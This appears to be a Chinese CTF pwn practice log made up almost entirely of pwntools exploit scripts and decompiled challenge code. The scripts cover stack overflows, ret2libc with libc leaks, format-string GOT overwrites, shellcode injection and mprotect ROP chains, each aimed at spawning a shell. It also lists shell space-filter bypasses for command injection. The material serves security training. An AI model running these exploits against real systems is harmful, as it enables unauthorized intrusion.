CTF-Pwn刷题记录

1
2
3
4
5
6
7
8

from pwn import *
host = 'challenge-6d9543332f6f24b5.sandbox.ctfhub.com'
port = 33376
#io = process("./pwn")
io = connect(host, port)
payload = 'A' * 0x78 + p64(0x4007b8)
io.sendline(payload)
io.interactive()

1
2
3
4
5
6
7
8

blacklist = ['cat','ls',' ','cd','echo','<','${IFS}']
#IFS表示 Internal Field Separator （内部字段分隔符）
while True:
    command = input()
    for i in blacklist:
        if i in command:
            exit(0)
    os.system(command)

1
2
3
4
5

from pwn import * 
p = remote("1.14.71.254",28082)
p.sendline("tac$IFS$9flag")
print(p.recv())
p.interactive()

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

#Linux下绕过空格过滤的方法：
#cat flag.txt
cat${IFS}flag.txt
#${IFS} 对应 内部字段分隔符
cat$IFS$9flag.txt
#${9} 对应 空字符串
cat<flag.txt
cat<>flag.txt
kg=$'\x20flag.txt'&&cat$kg
#${PS2} 对应字符 '>'
#${PS4} 对应字符 '+'

1
2
3
4
5

#Windows下绕过空格过滤的方法：
（实用性不是很广，也就type这个命令可以用）
type.\flag.txt
type,flag.txt
echo,123456

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

from pwn import *
#context(log_level='debug',arch='i386', os='linux')
context(log_level='debug', arch='amd64', os='linux')
#pwnfile= './question_4_3_x86'
#io = process(pwnfile)
io = remote('1.14.71.254', 28707)
# elf = ELF(pwnfile)
# rop = ROP(pwnfile)

padding = 0x18
#debug
""" gdb.attach(io)
pause() """
"""leak_func_name ='write'  
leak_func_got = elf.got[leak_func_name]
return_addr = elf.symbols['dofunc']"""
sh_addr = 0x4005B6
payload = b'a' * padding + p64(sh_addr)

#payload = flat(['a'*padding, return_addr])
#payload = flat([cyclic(padding), return_addr,sh_addr])
# delimiter = ''
# io.sendlineafter(delimiter, payload)
io.sendline(payload)
io.interactive()

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

int func()
{
  char v1[44]; // [rsp+0h] [rbp-30h] BYREF
  float v2; // [rsp+2Ch] [rbp-4h]

  v2 = 0.0;
  puts("Let's guess the number.");
  gets(v1);
  if ( v2 == 11.28125 )
    return system("cat /flag");
  else
    return puts("Its value should be 11.28125");
}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

from pwn import *
#context(log_level='debug',arch='i386', os='linux')
context(log_level='debug', arch='amd64', os='linux')
#pwnfile= './question_4_3_x86'
#io = process(pwnfile)
io = remote('1.14.71.254', 28146)
# elf = ELF(pwnfile)
# rop = ROP(pwnfile)

padding = 0x30 - 0x4
#debug
""" gdb.attach(io)
pause() """
"""leak_func_name ='write'  
leak_func_got = elf.got[leak_func_name]
return_addr = elf.symbols['dofunc']"""
sh_addr = 0x4005B6
v2 = 0x41348000
payload = b'a' * padding + p32(v2)

#payload = flat(['a'*padding, return_addr])
#payload = flat([cyclic(padding), return_addr,sh_addr])
delimiter = "Let's guess the number.\n"
io.sendlineafter(delimiter, payload)
# io.sendline(payload)
io.interactive()

1
2
3
4
5
6
7
8
9

# -*- coding: UTF-8 -*-
from pwn import *

io = process('./ret2text')
binsh_addr = 0x804863A
payload = b'a' * 112 + p32(binsh_addr)
delimiter = 'There is something amazing here, do you know anything?'
io.sendafter(delimiter, payload)
io.interactive()

1
2
3
4
5
6
7

ssize_t sub_8048484()
{
  char buf[108]; // [esp+1Ch] [ebp-6Ch] BYREF

  setbuf(stdin, buf);
  return read(0, buf, 0x100u);
}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59

# -*- coding: UTF-8 -*-
import sys
from pwn import *

context(log_level='debug', arch='i386', os='linux')
#context(log_level='debug',arch='amd64', os='linux')
pwnfile = './pwn200'
#通过sys.argv来确定打本地还是打远程
if len(sys.argv) < 2:
    io = process(pwnfile)
else:
    io = remote('61.147.171.105', 50890)
elf = ELF(pwnfile)
rop = ROP(pwnfile)

#以调试的模式运行程序
""" gdb.attach(io)
pause() """
start_addr = 0x080483d0
func_addr = 0x08048484
padding = 0x70
delimiter = 'Welcome to XDCTF2015~!'
write_plt = elf.symbols['write']#自动获取write函数的地址
read_plt = elf.symbols['read']


def leak(address):
    #泄露地址的板子
    payload = flat([b'a' * padding, write_plt, func_addr, 1, address, 4])
    #write函数和read函数都有三个参数，第三个参数代表字节长度
    io.sendline(payload)
    # io.sendlineafter(delimiter,payload)
    data = io.recv(4)
    print(data)
    return data


print(io.recv())
dyn = DynELF(leak, elf=ELF(pwnfile))
sys_addr = dyn.lookup("system", 'libc')
#自动获取泄露出来的libc中system函数的地址
print("system address:", hex(sys_addr))
payload1 = flat([b'a' * padding, start_addr])
# io.sendlineafter(delimiter,payload1)
# #调用start函数恢复栈
io.sendline(payload1)
io.recv()

ppp_addr = 0x0804856c
#这里是pop三次是栈指针指向system函数
bss_addr = elf.bss()
payload2 = flat([
    b'a' * padding, read_plt, ppp_addr, 0, bss_addr, 8, sys_addr, func_addr,
    bss_addr
])
#payload = b'a' * padding + p32(return_addr) + p32(sh_addr)
io.sendline(payload2)
io.send('/bin/sh')
io.interactive()

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48

# -*- coding: UTF-8 -*-
import sys
from pwn import *

context(log_level='debug', arch='i386', os='linux')
#context(log_level='debug',arch='amd64', os='linux')
pwnfile = './pwn200'
if len(sys.argv) < 2:
    io = process(pwnfile)
else:
    io = remote('61.147.171.105', 50890)
elf = ELF(pwnfile)
rop = ROP(pwnfile)

#以调试的模式运行程序
""" gdb.attach(io)
pause() """
start_addr = 0x080483d0
func_addr = 0x08048484
bss_addr = 0x804A048
#使用bss结尾处的内存区域，read之后跳转到start，程序会再次修改stdin和stdout的值
padding = 0x70
delimiter = 'Welcome to XDCTF2015~!\n'
write_plt = elf.symbols['write']
read_plt = elf.symbols['read']


def leak(address):
    payload = flat([b'a' * padding, write_plt, start_addr, 1, address, 4])
    # io.sendline(payload)
    io.sendlineafter(delimiter, payload)
    data = io.recv(4)
    print(data)
    return data


dyn = DynELF(leak, elf=ELF(pwnfile))
sys_addr = dyn.lookup("system", 'libc')
print("system address:", hex(sys_addr))

payload1 = flat([b'a' * padding, read_plt, start_addr, 0, bss_addr, 8])

io.sendlineafter(delimiter, payload1)
io.sendline('/bin/sh')
payload2 = flat([b'a' * padding, sys_addr, 0xdeadbeef, bss_addr])
#此时bss_addr上的值还是'/bin/sh'
io.sendlineafter(delimiter, payload2)
io.interactive()

1
2
3
4
5

__int64 vuln()
{
  char v1[16]; // [rsp+0h] [rbp-10h] BYREF
  return gets(v1);
}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

# -*- coding: UTF-8 -*-
import sys
from pwn import *
# context(log_level='debug', arch='i386', os='linux')
context(log_level='debug',arch='amd64', os='linux')
libc = ELF('./libc-2.23.so')
pwnfile = './1'
if len(sys.argv) < 2:
    io = process(pwnfile)
else:
    io = remote('1.14.71.254',28930)
elf = ELF(pwnfile)
rop = ROP(pwnfile)
 
#以调试的模式运行程序
#gdb.attach(io)
#pause()
main_addr = 0x4006D6
pop_rdi_ret_addr=0x0000000000400763
ret_addr = 0x0000000000400509
# exit_addr = 0x08048558
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']

padding = 0x10+0x8
payload = flat([b'a'*padding,pop_rdi_ret_addr,puts_got,puts_plt,main_addr])
io.sendline(payload)
puts_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print("puts_addr is : "+hex(puts_addr))
libc_base = puts_addr-libc.symbols['puts']
system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base+next(libc.search(b'/bin/sh'))
# print(hex(next(libc.search(b'/bin/sh'))))
# next() 返回迭代器的下一个项目
payload2 = flat([b'a'*padding,ret_addr,pop_rdi_ret_addr,binsh_addr,system_addr])
io.sendline(payload2)
io.interactive()

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [esp-14h] [ebp-20h]
  int v5; // [esp-10h] [ebp-1Ch]

  var[13] = 0;
  var[14] = 0;
  init();
  puts("What's your name?");
  __isoc99_scanf("%s", var, v4, v5);
  if ( *(_QWORD *)&var[13] )
  {
    if ( *(_QWORD *)&var[13] == 17LL )
      system("/bin/sh");
    else
      printf(
        "something wrong! val is %d",
        var[0],
        var[1],
        var[2],
        var[3],
        var[4],
        var[5],
        var[6],
        var[7],
        var[8],
        var[9],
        var[10],
        var[11],
        var[12],
        var[13],
        var[14]);
  }
  else
  {
    printf("%s, Welcome!\n", var);
    puts("Try do something~");
  }
  return 0;
}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

# -*- coding: UTF-8 -*-
import sys
from pwn import *

context(log_level='debug', arch='i386', os='linux')
#context(log_level='debug',arch='amd64', os='linux')

io = remote('node4.buuoj.cn',27987)
# io = process('./ciscn_2019_n_8')
payload = p32(0x11) * 14
#payload = p32(17) * 14
io.sendline(payload)
io.interactive()

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

# -*- coding: UTF-8 -*-
import sys
from pwn import *

# context(log_level='debug', arch='i386', os='linux')
context(log_level='debug',arch='amd64', os='linux')
pwnfile = './bjdctf_2020_babystack'
if len(sys.argv) < 2:
    io = process(pwnfile)
else:
    io = remote('node4.buuoj.cn', 29341)
elf = ELF(pwnfile)
rop = ROP(pwnfile)

#以调试的模式运行程序
# gdb.attach(io)
# pause()
ret_addr=0x400561
sys_addr=0x4006E6

payload=flat([b'a'*0x18,ret_addr,sys_addr])
io.sendlineafter(b'name:\n',b'-1')
io.sendlineafter(b'name?\n',payload)
io.interactive()

1
2
3
4
5
6
7

from pwntools import *

init("./pwn2_1")

payload = b"\x00"*0x10 + b"woodwood" + p64(0x4011EF)
sl(payload)
ia()

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [rsp+3h] [rbp-3Dh]
  int i; // [rsp+4h] [rbp-3Ch]
  int j; // [rsp+4h] [rbp-3Ch]
  char *format; // [rsp+8h] [rbp-38h] BYREF
  _IO_FILE *fp; // [rsp+10h] [rbp-30h]
  char *v9; // [rsp+18h] [rbp-28h]
  char v10[24]; // [rsp+20h] [rbp-20h] BYREF
  unsigned __int64 v11; // [rsp+38h] [rbp-8h]

  v11 = __readfsqword(0x28u);
  fp = fopen("flag.txt", "r");
  for ( i = 0; i <= 21; ++i )
    v10[i] = gets(fp);
  fclose(fp);
  v9 = v10;
  puts("what's the flag");
  fflush(_bss_start);
  format = 0LL;
  __isoc99_scanf("%ms", &format);
  for ( j = 0; j <= 21; ++j )
  {
    v4 = format[j];
    if ( !v4 || v10[j] != v4 )
    {
      puts("You answered:");
      printf(format);
      puts("\nBut that was totally wrong lol get rekt");
      fflush(_bss_start);
      return 0;
    }
  }
  printf("That's right, the flag is %s\n", v9);
  fflush(_bss_start);
  return 0;
}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

from pwn import *
from LibcSearcher import *
goodluck = ELF('./goodluck')
if args['REMOTE']:
    sh = remote('pwn.sniperoj.cn', 30017)
else:
    sh = process('./goodluck')
payload = b"%9$s"
print (payload)
##gdb.attach(sh)
print (sh.recv())
sh.sendline(payload)
print (sh.recv())
# sh.interactive()

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

int get_file()
{
  char dest[200]; // [esp+1Ch] [ebp-FCh] BYREF
  char s1[40]; // [esp+E4h] [ebp-34h] BYREF
  char *i; // [esp+10Ch] [ebp-Ch]

  printf("enter the file name you want to get:");
  __isoc99_scanf("%40s", s1);
  if ( !strncmp(s1, "flag", 4u) )
    puts("too young, too simple");
  for ( i = (char *)file_head; i; i = (char *)*((_DWORD *)i + 60) )
  {
    if ( !strcmp(i, s1) )
    {
      strcpy(dest, i + 40);
      return printf(dest);
    }
  }
  return printf(dest);
}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69

from pwn import *
from LibcSearcher import LibcSearcher
##context.log_level = 'debug'
pwn3 = ELF('./pwn3')
if args['REMOTE']:
    sh = remote('111', 111)
else:
    sh = process('./pwn3')


def get(name):
    sh.sendline('get')
    sh.recvuntil('enter the file name you want to get:')
    sh.sendline(name)
    data = sh.recv()
    return data


def put(name, content):
    sh.sendline('put')
    sh.recvuntil('please enter the name of the file you want to upload:')
    sh.sendline(name)
    sh.recvuntil('then, enter the content:')
    sh.sendline(content)


def show_dir():
    sh.sendline('dir')


tmp = 'sysbdmin'
name = ""
for i in tmp:
    name += chr(ord(i) - 1)


## password
def password():
    sh.recvuntil('Name (ftp.hacker.server:Rainism):')
    sh.sendline(name)


##password
password()
## get the addr of puts
puts_got = pwn3.got['puts']
log.success('puts got : ' + hex(puts_got))
put('1111', '%8$s' + p32(puts_got))
puts_addr = u32(get('1111')[:4])

## get addr of system
libc = LibcSearcher("puts", puts_addr)
system_offset = libc.dump('system')
puts_offset = libc.dump('puts')
system_addr = puts_addr - puts_offset + system_offset
log.success('system addr : ' + hex(system_addr))

## modify puts@got, point to system_addr
payload = fmtstr_payload(7, {puts_got: system_addr})
put('/bin/sh;', payload)
sh.recvuntil('ftp>')
sh.sendline('get')
sh.recvuntil('enter the file name you want to get:')
##gdb.attach(sh)
sh.sendline('/bin/sh;')

## system('/bin/sh')
show_dir()
sh.interactive()

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+Ch] [rbp-4h] BYREF

  init(argc, argv, envp);//清空缓冲区
  puts("EEEEEEE                            hh      iii                ");
  puts("EE      mm mm mmmm    aa aa   cccc hh          nn nnn    eee  ");
  puts("EEEEE   mmm  mm  mm  aa aaa cc     hhhhhh  iii nnn  nn ee   e ");
  puts("EE      mmm  mm  mm aa  aaa cc     hh   hh iii nn   nn eeeee  ");
  puts("EEEEEEE mmm  mm  mm  aaa aa  ccccc hh   hh iii nn   nn  eeeee ");
  puts("====================================================================");
  puts("Welcome to this Encryption machine\n");
  begin();//表单初始化
  while ( 1 )
  {
    while ( 1 )
    {
      fflush(0LL);
      v4 = 0;
      __isoc99_scanf("%d", &v4);
      getchar();
      if ( v4 != 2 )
        break;
      puts("I think you can do it by yourself");
      begin();
    }
    if ( v4 == 3 )
    {
      puts("Bye!");
      return 0;
    }
    if ( v4 != 1 )
      break;
    encrypt();//Vuln-ret2libc
    begin();
  }
  puts("Something Wrong!");
  return 0;
}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

int encrypt()
{
  size_t v0; // rbx
  char s[48]; // [rsp+0h] [rbp-50h] BYREF
  __int16 v3; // [rsp+30h] [rbp-20h]

  memset(s, 0, sizeof(s));
  v3 = 0;
  puts("Input your Plaintext to be encrypted");
  gets(s);//Stackoverflow
  while ( 1 )
  {
    v0 = (unsigned int)x;
    if ( v0 >= strlen(s) )//利用b‘/x00’和strlen()绕过encrypt()
      break;
    if ( s[x] <= 96 || s[x] > 122 )
    {
      if ( s[x] <= 64 || s[x] > 90 )
      {
        if ( s[x] > 47 && s[x] <= 57 )
          s[x] ^= 0xFu;
      }
      else
      {
        s[x] ^= 0xEu;
      }
    }
    else
    {
      s[x] ^= 0xDu;
    }
    ++x;
  }
  puts("Ciphertext");
  return puts(s);
}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64

# -*- coding: UTF-8 -*-
import sys
from pwn import *
from LibcSearcher import *
# context(log_level='debug', arch='i386', os='linux')
context(log_level='debug',arch='amd64', os='linux')
pwnfile = './0'
if len(sys.argv) < 2:
    io = process(pwnfile)
else:
    io = remote('node4.buuoj.cn', 25164)
elf = ELF(pwnfile)
rop = ROP(pwnfile)
 
#以调试的模式运行程序
#gdb.attach(io)
#pause()
# 本地换多个版本libc打
# libc = ELF('./libc-2.27.so')
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

puts_plt = elf.plt['puts']
#用puts函数plt表的地址调用puts函数
puts_got = elf.got['puts']
main_addr=elf.symbols['main']

pop_rdi_ret = 0x400c83
ret_addr = 0x4006b9
io.recvline()
io.sendline('1')
padding = 0x58
payload = flat([b'a' * padding, pop_rdi_ret, puts_got, puts_plt, main_addr])
io.recvline()
io.sendline(payload)
io.recvline()
io.recvline()
puts_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
# puts_addr = u64(io.recvuntil('\n',drop=True).ljust(8,b'\x00'))
#从0x7F（这一行末尾）往前截取六字节，然后用\x00补全八字节
#截取低三位，分页机制导致libc后三位恒不变，加以区分。
libc=LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
sys_addr=libc_base+libc.dump('system')
binsh_addr=libc_base+libc.dump('str_bin_sh')
# 本地libc计算相应内存地址。
# libc_base = puts_addr - libc.symbols['puts']
# system_addr = libc_base + libc.symbols['system']
# binsh_addr = libc_base + libc.search('/bin/sh').next()

io.recvline()
io.sendline(b'1')
payload2=flat([b'0',b'a' * (padding-0x01), ret_addr,pop_rdi_ret, binsh_addr,sys_addr])
# 高版本libc加上ret来平衡堆栈
io.recv()
io.sendline(payload2)
io.interactive()
# 由于页对齐机制
# 4kb为一页
# 4kb=4*1024=2^12=0x1000
# 所有页都是这样对齐的, 所以在分配给动态链接库的时候
# 不会影响到低三字节
# 由此可以确定版本信息了
# 那种分配给动态链接库的内存, 也是n个页
# n*0x1000怎么样都不会影响低三字节的

1
2
3
4
5
6

ssize_t vulnerable_function()
{
  char buf[136]; // [esp+0h] [ebp-88h] BYREF
  printf("What's this:%p?\n", buf);
  return read(0, buf, 0x100u);
}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

# -*- coding: UTF-8 -*-
import sys
from pwn import *
context(log_level='debug', arch='i386', os='linux')
#context(log_level='debug',arch='amd64', os='linux')
pwnfile = './2'
if len(sys.argv) < 2:
    io = process(pwnfile)
else:
    io = remote("pwn2.jarvisoj.com",9877)
elf = ELF(pwnfile)
rop = ROP(pwnfile)
 
#以调试的模式运行程序
#gdb.attach(io)
#pause()

shellcode = asm(shellcraft.i386.linux.sh())
line = io.recvline()[14:-2]
# print(line)
buf_addr = int(line,16)
# 将十六进制数转为十进制数
# print(buf_addr)
payload = shellcode + b'A' * (0x88 + 0x4 - len(shellcode)) + p32(buf_addr)
io.send(payload)
io.interactive()
io.close()

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

# -*- coding: UTF-8 -*-
import sys
from pwn import *
# context(log_level='debug', arch='i386', os='linux')
context(log_level='debug',arch='amd64', os='linux')
pwnfile = './1'
if len(sys.argv) < 2:
    io = process(pwnfile)
else:
    io = remote('1.14.71.254',28835)
elf = ELF(pwnfile)
rop = ROP(pwnfile)
 
#以调试的模式运行程序
#gdb.attach(io)
#pause()
 
# print(io.recv())
padding = 0xa
flag_addr=0x400807
payload = flat([b'a' * padding,flag_addr])
io.sendline(payload)
io.interactive()

1
2
3
4
5
6
7
8

int sub_400632()
{
  char buf[64]; // [rsp+0h] [rbp-40h] BYREF

  puts("Do you know how to do buffer overflow?");
  read(0, buf, 0x100uLL);
  return puts("I hope you win");
}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

# -*- coding: UTF-8 -*-
import sys
from pwn import *
from LibcSearcher import *
# context(log_level='debug', arch='i386', os='linux')
context(log_level='debug',arch='amd64', os='linux')
pwnfile = './2'
if len(sys.argv) < 2:
    io = process(pwnfile)
else:
    io = remote('1.14.71.254',28795)
elf = ELF(pwnfile)
rop = ROP(pwnfile)
 
#以调试的模式运行程序
#gdb.attach(io)
#pause()
 
ret_addr=0x0000000000400506
pop_rdi_ret_addr=0x0000000000400743
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main_addr=0x40066B

padding = 0x40+0x8


payload = flat([b'a' * padding,pop_rdi_ret_addr,puts_got,puts_plt,main_addr])
io.recv()
io.sendline(payload)
puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))
libc=LibcSearcher('puts',puts_addr)
libc_base=puts_addr-libc.dump('puts')
sys_addr=libc_base+libc.dump('system')
binsh_addr=libc_base+libc.dump('str_bin_sh')

payload1 =flat([b'a' * padding,ret_addr,pop_rdi_ret_addr,binsh_addr,sys_addr])
io.recv()
io.sendline(payload1)
io.interactive()

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

int encrypt()
{
  size_t v0; // rbx
  char s[48]; // [rsp+0h] [rbp-50h] BYREF
  __int16 v3; // [rsp+30h] [rbp-20h]

  memset(s, 0, sizeof(s));
  v3 = 0;
  puts("Input your Plaintext to be encrypted");
  gets(s);
  while ( 1 )
  {
    v0 = (unsigned int)x;
    if ( v0 >= strlen(s) )
      break;
    if ( s[x] <= 96 || s[x] > 122 )
    {
      if ( s[x] <= 64 || s[x] > 90 )
      {
        if ( s[x] > 47 && s[x] <= 57 )
          s[x] ^= 0xCu;
      }
      else
      {
        s[x] ^= 0xDu;
      }
    }
    else
    {
      s[x] ^= 0xEu;
    }
    ++x;
  }
  puts("Ciphertext");
  return puts(s);
}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

# -*- coding: UTF-8 -*-
import sys
from pwn import *
from LibcSearcher import *
# context(log_level='debug', arch='i386', os='linux')
context(log_level='debug',arch='amd64', os='linux')
pwnfile = './3'
if len(sys.argv) < 2:
    io = process(pwnfile)
else:
    io = remote('1.14.71.254',28986)
elf = ELF(pwnfile)
rop = ROP(pwnfile)
 
#以调试的模式运行程序
#gdb.attach(io)
#pause()
 
ret_addr=0x00000000004006b9
pop_rdi_ret_addr=0x0000000000400c83
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main_addr=0x400B28

padding = 0x50+0x8

payload = flat([b'\x00',b'a' * (padding-0x1),pop_rdi_ret_addr,puts_got,puts_plt,main_addr])
io.recv()
io.sendline('1')
io.recv()
io.sendline(payload)
puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))
libc=LibcSearcher('puts',puts_addr)
libc_base=puts_addr-libc.dump('puts')
sys_addr=libc_base+libc.dump('system')
binsh_addr=libc_base+libc.dump('str_bin_sh')

payload1 =flat([b'\x00',b'a' *(padding-0x1),ret_addr,pop_rdi_ret_addr,binsh_addr,sys_addr])
io.recv()
io.sendline('1')
io.recv()
io.sendline(payload1)
io.interactive()

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

int __cdecl sub_804871F(int a1)
{
  size_t v1; // eax
  char s[32]; // [esp+Ch] [ebp-4Ch] BYREF
  char buf[32]; // [esp+2Ch] [ebp-2Ch] BYREF
  ssize_t v5; // [esp+4Ch] [ebp-Ch]

  memset(s, 0, sizeof(s));
  memset(buf, 0, sizeof(buf));
  sprintf(s, "%ld", a1);
  v5 = read(0, buf, 0x20u);
  buf[v5 - 1] = 0;//影响不到
  v1 = strlen(buf);
  if ( strncmp(buf, s, v1) )
    exit(0);
  write(1, "Correct\n", 8u);
  return (unsigned __int8)buf[7];
}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

ssize_t __cdecl sub_80487D0(char a1)//上一个程序的buf[7]是a1
{
  char buf[231]; // [esp+11h] [ebp-E7h] BYREF

  if ( a1 == 127 )
    return read(0, buf, 0xC8u);
  else
    return read(0, buf, a1);
    //这里有栈溢出漏洞
}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

# -*- coding: UTF-8 -*-
import sys
from pwn import *
context(log_level='debug', arch='i386', os='linux')
#context(log_level='debug',arch='amd64', os='linux')
libc = ELF('./libc-2.23.so')
pwnfile = './0'
if len(sys.argv) < 2:
    io = process(pwnfile)
else:
    io = remote('node4.buuoj.cn',26127)
elf = ELF(pwnfile)
rop = ROP(pwnfile)
 
#以调试的模式运行程序
#gdb.attach(io)
#pause()
main_addr = 0x8048825
exit_addr = 0x08048558
write_plt=elf.plt['write']
write_got=elf.got['write']

payload1=flat([b'\x00',b'\xff'*7])
io.sendline(payload1)
io.recv()
padding = 0xe7+0x4
payload2=flat([b'a'*padding,write_plt,main_addr,1,write_got,4])
io.sendline(payload2)
write_addr = u32(io.recv(4))
print("write_addr is : "+hex(write_addr))
libc_base = write_addr-libc.symbols['write']
system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base+next(libc.search(b'/bin/sh'))
# print(hex(next(libc.search(b'/bin/sh'))))
# next() 返回迭代器的下一个项目
payload3 = flat([b'a'*padding,system_addr,exit_addr,binsh_addr])
# 返回地址不填exit_addr有可能会没有回显
io.sendline(payload1)
io.recv()
io.sendline(payload3)
io.interactive()

1
2
3
4
5
6
7
8

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[56]; // [esp+4h] [ebp-38h] BYREF

  printf("Qual a palavrinha magica? ", v4[0]);
  gets(v4);
  return 0;
}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

void __cdecl get_flag(int a1, int a2)
{
  int v2; // esi
  unsigned __int8 v3; // al
  int v4; // ecx
  unsigned __int8 v5; // al

  if ( a1 == 814536271 && a2 == 425138641 )
  {
    v2 = fopen("flag.txt", "rt");
    v3 = getc(v2);
    if ( v3 != 255 )
    {
      v4 = (char)v3;
      do
      {
        putchar(v4);
        v5 = getc(v2);
        v4 = (char)v5;
      }
      while ( v5 != 255 );
    }
    fclose(v2);
  }
}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

# -*- coding: UTF-8 -*-
import sys
from pwn import *
context(log_level='debug', arch='i386', os='linux')
#context(log_level='debug',arch='amd64', os='linux')
pwnfile = './1'
if len(sys.argv) < 2:
    io = process(pwnfile)
else:
    io = remote('node4.buuoj.cn', 25543)
elf = ELF(pwnfile)
rop = ROP(pwnfile)
 
#以调试的模式运行程序
#gdb.attach(io)
#pause()
getflag_addr=0x080489A0
padding = 0x38
exit_addr = 0x0804E6A0
# io.recv()
payload = flat([b'a' * padding, getflag_addr,exit_addr,814536271,425138641])
io.sendline(payload)
io.interactive()

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

from pwn import *
from LibcSearcher import *

io = remote('node3.buuoj.cn',28526)
elf = ELF('./get_started_3dsctf_2016')

bss=0x080eb000
pop_ebx_esi_edi_ret=0x080509a5

payload = 'A' * 0x38 + p32(elf.sym['mprotect']) + p32(pop_ebx_esi_edi_ret) + p32(bss) + p32(0x2c) + p32(7)
payload += p32(elf.sym['read']) + p32(bss) + p32(0) + p32(bss) + p32(0x2c)
io.sendline(payload)
payload=asm(shellcraft.sh())
io.sendline(payload)

io.interactive()

1
2
3
4
5
6
7

ssize_t vulnerable_function()
{
  char buf[128]; // [rsp+0h] [rbp-80h] BYREF

  system("echo Input:");
  return read(0, buf, 0x200uLL);
}

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

# -*- coding: UTF-8 -*-
import sys
from pwn import *
# context(log_level='debug', arch='i386', os='linux')
context(log_level='debug',arch='amd64', os='linux')
pwnfile = './2'
if len(sys.argv) < 2:
    io = process(pwnfile)
else:
    io = remote('node4.buuoj.cn', 25171)
elf = ELF(pwnfile)
rop = ROP(pwnfile)
 
#以调试的模式运行程序
#gdb.attach(io)
#pause()
pop_rdi_ret = 0x4006b3
system_addr = 0x4004C0
#要找sysrem函数plt的地址
# .plt:00000000004004C0 ; int system(const char *command)
# .plt:00000000004004C0 _system proc near                       ; CODE XREF: vulnerable_function+D↓p
# .plt:00000000004004C0 ; main+1E↓p
# .plt:00000000004004C0 FF 25 9A 05 20 00             jmp     cs:off_600A60
